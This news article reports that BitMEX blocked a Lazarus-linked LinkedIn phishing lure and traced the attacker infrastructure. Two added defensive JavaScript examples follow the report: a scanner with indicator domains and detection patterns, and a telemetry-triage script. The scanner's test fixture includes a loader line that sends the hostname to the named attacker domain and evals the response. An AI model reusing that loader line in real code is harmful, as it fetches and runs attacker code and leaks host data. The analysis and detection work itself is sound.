BitMEX Blocks Attempted Cyberattack by North Korea’s Lazarus Group Disguised as NFT Partnership Offer on LinkedIn

BitMEX thwarted a phishing attack by the Lazarus Group disguised as a LinkedIn NFT collaboration pitch. The attack involved malicious code hosted on GitHub, designed to steal credentials and system data via obfuscated JavaScript. The investigation exposed an attacker’s real IP address and revealed over 850 infections linked to the same campaign.

Pardon Joshua
Pardon Joshua is a seasoned crypto journalist with three years of experience in the rapidly evolving blockchain and digital currency space. His insightful articles have graced the pages of reputable publications such as CoinGape, BitcoinSensus, and CoinGram.us, establishing him as a trusted voice in the industry. Pardon's work combines in-depth technical analysis with a keen understanding of market trends, offering readers valuable insights into the complex world of cryptocurrencies.

BitMEX has successfully thwarted a phishing attack from the notorious North Korean hacking group Lazarus, which disguised its attempt as a professional outreach for an NFT marketplace collaboration on LinkedIn. 

According to a report by BitMEX’s team, a company employee received an unsolicited message that quickly raised red flags.

The message invited them to collaborate on a Web3 project and directed them to a private GitHub repository filled with malicious code. 

Recognizing the familiar patterns of Lazarus-linked social engineering, the employee flagged the communication, prompting a deeper investigation. 

BitMEX labeled the initial approach as “unsophisticated,” highlighting Lazarus’s reliance on basic phishing tactics as the entry point into more complex exploitation campaigns.

Investigation Reveals Embedded Malware and Lazarus Infrastructure

Upon inspecting the GitHub repository, BitMEX researchers uncovered obfuscated JavaScript code embedded within a seemingly benign Next.js/React website. 

The code included eval functions capable of executing remote scripts sourced from previously identified Lazarus-controlled domains such as regioncheck[.]net and fashdefi[.]store. 

Using tools like WebCrack, the team deobfuscated the code, revealing that it harvested sensitive metadata, such as usernames, IP addresses, hostnames, geolocation, and OS info, and stored it in an open Supabase database. 

The infrastructure vulnerability proved to be a critical mistake for the hackers, as it allowed BitMEX to access and analyze data from compromised machines, shedding light on victim profiles and the broader scope of the campaign.
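The loader pattern described above (obfuscated source that fetches a script from a remote host and hands it to eval) is easy to triage statically before anyone runs a stranger's repository. The following is an added example written for this article, not code from BitMEX or from the report: a small heuristic scanner that flags dynamic code execution combined with network fetches, hex-escape string obfuscation and OS-information collection, and matches the two indicator domains the report names. The check ids, the heuristics and both sample source strings are constructed for this example.

```javascript
// Added example, not BitMEX's code: static triage of a JavaScript/Next.js source
// file for the remote-eval loader pattern described in the BitMEX report.

// Indicator domains as published (defanged) in the report; refanged for matching.
const INDICATOR_DOMAINS = ["regioncheck[.]net", "fashdefi[.]store"].map((d) =>
  d.replace("[.]", ".")
);

// Heuristic checks; each is a cheap regex over the raw source text.
const CHECKS = [
  {
    id: "dynamic-eval",
    test: (src) => /\beval\s*\(|\bnew\s+Function\s*\(/.test(src),
    why: "eval()/new Function() executes strings as code",
  },
  {
    id: "remote-fetch",
    test: (src) => /\b(fetch|axios|XMLHttpRequest)\b|require\(['"]https?['"]\)/.test(src),
    why: "source can pull content from the network",
  },
  {
    id: "hex-escapes",
    // eight or more \xNN escapes is a crude but effective obfuscation signal
    test: (src) => (src.match(/\\x[0-9a-fA-F]{2}/g) || []).length >= 8,
    why: "many \\xNN escapes, typical of string obfuscation",
  },
  {
    id: "sysinfo-collection",
    test: (src) => /\bos\.(userInfo|hostname|platform)\s*\(/.test(src),
    why: "collects username/hostname/OS details",
  },
];

function findIndicatorDomains(src) {
  return INDICATOR_DOMAINS.filter((d) => src.includes(d));
}

// Returns the triggered check ids, any indicator hits, and a verdict.
// A known indicator is decisive; otherwise eval + fetch together is the loader pattern.
function scanSource(src) {
  const findings = CHECKS.filter((c) => c.test(src)).map((c) => c.id);
  const iocs = findIndicatorDomains(src);
  const loader =
    findings.includes("dynamic-eval") && findings.includes("remote-fetch");
  const verdict = iocs.length > 0 ? "malicious" : loader ? "suspicious" : "clean";
  return { findings, iocs, verdict };
}

// Constructed fixture: the minimal shape of the loader the report describes.
const SUSPECT_SAMPLE = [
  "const os = require('os');",
  "const h = os.hostname();",
  "const u = 'https://regioncheck.net/' + encodeURIComponent(h);",
  "fetch(u).then(r => r.text()).then(t => eval(t));",
  "const s = '\\x75\\x73\\x65\\x72\\x49\\x6e\\x66\\x6f';",
].join("\n");

// Constructed fixture: an ordinary React component that fetches its own API.
// It uses fetch but never eval, so it must not be flagged.
const BENIGN_SAMPLE = [
  "import { useEffect, useState } from 'react';",
  "export default function Items() {",
  "  const [items, setItems] = useState([]);",
  "  useEffect(() => { fetch('/api/items').then(r => r.json()).then(setItems); }, []);",
  "  return <ul>{items.map(i => <li key={i.id}>{i.name}</li>)}</ul>;",
  "}",
].join("\n");

console.log("suspect:", JSON.stringify(scanSource(SUSPECT_SAMPLE)));
console.log("benign: ", JSON.stringify(scanSource(BENIGN_SAMPLE)));
```

The point of the benign fixture is specificity: a Next.js site legitimately calls fetch everywhere, so fetch alone is noise; it is the combination with eval, the obfuscated strings and the host-information calls that separates a loader from ordinary front-end code. Run it over every .js/.ts file of an unsolicited repository before opening the project in an editor that executes scripts.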


Lazarus’s Operational Mistakes Expose Their Tracks

BitMEX’s investigation unearthed significant operational security lapses within the Lazarus operation. 

Logs from the exposed Supabase instance revealed over 850 entries dating back to March 31, 2025, including 174 unique compromised devices. 

The team discovered that many infected systems reused usernames and hostnames, suggesting poor internal hygiene or testing processes by the attackers. 

In a rare slip-up, one infection was traced back to a residential China Mobile IP address in Jiaxing, China, deviating from the usual VPN-based anonymization. 

The slip exposed the potential real-world location of an operator tied to the alias “Victor.” Such leaks are uncommon for state-sponsored cyber groups and underscore inconsistencies in the Lazarus Group’s operational discipline.
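The figures in this section (entries versus unique devices, reused usernames and hostnames, one IP that breaks the VPN pattern) all come from grouping the exposed telemetry rows. The following is an added example, not BitMEX's analysis or data: it groups constructed rows by the username/hostname/OS identity the implant reports, counts unique devices, lists identities that report from several IPs, separates IPs shared by many devices (VPN or proxy exits) from IPs tied to a single identity, which are the ones worth a WHOIS or ASN lookup. The row fields and every value in them are constructed for this example.

```javascript
// Added example, not BitMEX's code: triage of victim-telemetry rows of the kind
// the report describes. Every row below is constructed (documentation IP ranges).
const ROWS = [
  { ts: "2025-03-31T10:00:00Z", user: "alice", host: "DESKTOP-A1", os: "Windows 11", ip: "203.0.113.5" },
  { ts: "2025-03-31T10:05:00Z", user: "alice", host: "DESKTOP-A1", os: "Windows 11", ip: "203.0.113.5" }, // repeat beacon
  { ts: "2025-04-02T08:00:00Z", user: "bob", host: "bob-mbp", os: "macOS 14", ip: "198.51.100.9" },
  { ts: "2025-04-03T09:00:00Z", user: "test", host: "WIN-TEST", os: "Windows 10", ip: "198.51.100.9" },
  { ts: "2025-04-03T09:30:00Z", user: "test", host: "WIN-TEST", os: "Windows 10", ip: "192.0.2.77" }, // same identity, new IP
  { ts: "2025-04-04T11:00:00Z", user: "test", host: "WIN-TEST", os: "Windows 10", ip: "203.0.113.5" },
];

// A device identity: the username/hostname/OS tuple the implant reports.
const fingerprint = (r) => `${r.user}@${r.host} (${r.os})`;

function triage(rows) {
  const devices = new Map(); // fingerprint -> { entries, ips: Set, firstSeen }
  const ipDevices = new Map(); // ip -> Set of fingerprints seen from it
  for (const r of rows) {
    const k = fingerprint(r);
    const d = devices.get(k) || { entries: 0, ips: new Set(), firstSeen: r.ts };
    d.entries += 1;
    d.ips.add(r.ip);
    if (r.ts < d.firstSeen) d.firstSeen = r.ts; // ISO-8601 strings sort lexically
    devices.set(k, d);
    if (!ipDevices.has(r.ip)) ipDevices.set(r.ip, new Set());
    ipDevices.get(r.ip).add(k);
  }
  // Same identity reporting from several IPs: reused test rigs or hopping VPN exits.
  const reusedIdentities = [...devices].filter(([, d]) => d.ips.size > 1).map(([k]) => k);
  // One IP reported by several identities: a shared exit, not a real victim location.
  const sharedExitIps = [...ipDevices].filter(([, s]) => s.size > 1).map(([ip]) => ip);
  // An IP tied to exactly one identity breaks the shared-exit pattern; look it up.
  const singletonIps = [...ipDevices].filter(([, s]) => s.size === 1).map(([ip]) => ip);
  const firstSeen = rows.map((r) => r.ts).sort()[0];
  return {
    totalEntries: rows.length,
    uniqueDevices: devices.size,
    firstSeen,
    reusedIdentities,
    sharedExitIps,
    singletonIps,
  };
}

console.log(JSON.stringify(triage(ROWS), null, 2));
```

On the constructed rows this yields six entries but three unique devices, one identity (the "test" machine) beaconing from three different addresses, two addresses shared across identities, and one address seen from a single identity only. That last bucket is where an operator's own residential connection would surface when the usual VPN is not in use.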


Sophistication in Layers: Basic Entry, Complex Post-Exploitation

While Lazarus Group is often linked to some of the most impactful crypto heists, including breaches of Stake, Bybit, and Phemex, their attacks often start with deceptively simple techniques like phishing. 

BitMEX’s report highlights this pattern, emphasizing a clear divide between the group’s entry-level operatives and its advanced post-exploitation teams. 

Once access is achieved, a more sophisticated faction typically takes over, as seen in previous incidents where they infiltrated AWS accounts or tampered with wallet interfaces. 

BitMEX’s defense not only neutralized this specific attack but also allowed researchers to monitor infection patterns and track attacker activity, reinforcing the importance of proactive threat detection in the crypto sector.
